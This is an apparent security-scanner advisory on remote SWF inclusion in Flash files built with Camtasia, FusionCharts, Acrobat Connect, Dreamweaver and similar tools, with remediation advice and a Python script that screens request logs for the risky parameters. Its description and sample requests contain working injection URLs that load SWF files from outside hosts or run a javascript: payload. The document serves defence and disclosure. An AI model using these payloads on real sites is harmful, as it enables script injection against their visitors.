Possible remote SWF inclusion

Description
  • A number of products used to create SWF files (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) were found vulnerable to remote SWF inclusion. This page includes a SWF file that is possibly affected by these vulnerabilities.
    • Adobe Dreamweaver and Contribute: the "skinName" parameter loads an arbitrary Flash file:
      http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil
    • Adobe Acrobat Connect (including Macromedia Breeze): the "baseurl" parameter loads an arbitrary Flash file:
      http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
    • InfoSoft FusionCharts: the "dataURL" parameter loads an arbitrary Flash file:
      http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E
    • Techsmith Camtasia: the "csPreloader" parameter loads an arbitrary Flash file:
      http://www.example.com/Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
    • Autodemo: the "onend" parameter loads arbitrary URLs, including the JavaScript protocol handler:
      http://www.example.com/control.swf?onend=javascript:alert(1)//
Remediation
  • The product used to create this SWF file (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) should be upgraded to the latest version and the SWF file should be recompiled with the fixed version.
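  • Until the SWF files can be recompiled, requests to them can be screened for the five parameters named above carrying an off-site or script URL. The following is an added example (not from the original page or from any of the listed vendors); the request lines and the evil.example host are constructed for illustration, and the check assumes the parameter names are exactly those listed in the description.

```python
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the description above names, keyed lower-case to the product whose
# SWF exposes them. Assumption: the SWF cannot be recompiled right away, so
# requests (from access logs or a reverse proxy) are screened in the meantime.
RISKY_PARAMS = {
    "skinname": "Adobe Dreamweaver / Contribute",
    "baseurl": "Adobe Acrobat Connect / Macromedia Breeze",
    "dataurl": "InfoSoft FusionCharts",
    "cspreloader": "Techsmith Camtasia",
    "onend": "Autodemo",
}

def is_external(value: str) -> bool:
    """True if the value would make the player load a non-local resource."""
    # Decode a second time: the FusionCharts example is double-encoded, and the
    # player decodes the value again when it resolves the URL.
    v = unquote(value).strip().lower()
    if v.startswith(("javascript:", "data:", "vbscript:", "//")):
        return True
    # Any embedded scheme counts, even inside an injected tag like <img src="http://...">
    return "://" in v

def check_request(url: str) -> list:
    """Return (parameter, product, decoded value) for every risky parameter in a
    request for a .swf whose value points at an external resource."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".swf"):
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        product = RISKY_PARAMS.get(name.lower())
        if product and is_external(value):
            findings.append((name, product, unquote(value)))
    return findings

# Constructed sample request lines (not real traffic); evil.example is a placeholder host.
SAMPLE_REQUESTS = [
    "/FLVPlayer_Progressive.swf?skinName=Clear_Skin_1",              # local skin: fine
    "/FLVPlayer_Progressive.swf?skinName=http://evil.example/DoKnowEvil",
    "/main.swf?baseurl=http://evil.example/DoKnowEvil.swf%3f",
    "/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//evil.example/x.swf%3F.jpg%22%3E",
    "/Example_controller.swf?csPreloader=%2F%2Fevil.example%2Fpre.swf",
    "/control.swf?onend=javascript:alert(1)//",
    "/control.swf?onend=end.html",                                   # local page: fine
]

def scan(requests=SAMPLE_REQUESTS) -> list:
    """Pair each request that carries an external value in a risky parameter with its findings."""
    return [(req, hits) for req in requests if (hits := check_request(req))]

if __name__ == "__main__":
    for req, hits in scan():
        for name, product, value in hits:
            print(f"{product}: {name}={value!r} in {req}")
```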
References